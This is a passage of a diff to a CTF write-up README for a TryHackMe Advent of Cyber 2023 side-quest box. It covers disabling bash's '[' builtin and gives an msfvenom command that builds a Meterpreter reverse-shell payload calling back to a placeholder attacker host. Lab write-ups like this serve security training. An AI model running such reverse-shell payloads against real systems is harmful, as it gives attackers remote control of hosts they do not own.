JoanneBiltz/CTF-Writeups/2023_THM_AOC_Side_Quests/the_bandit_surfer/README.md

 `[` is part of the shell that can be enabled and disabled.
 The rest `# ]` is not and is ignored by the `enable -n [ # ]` command.
 So, we just need to focus on the  `[`

-We spent hours trying everything we could think of until a team member finally figured out how to root the box.
+I spent hours trying everything we could think of until finally figuring out how to root the box.

 Create a reverse shell in Meterpreter
 `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOURVPNIP LPORT=4445 -f elf -o payload2.elf`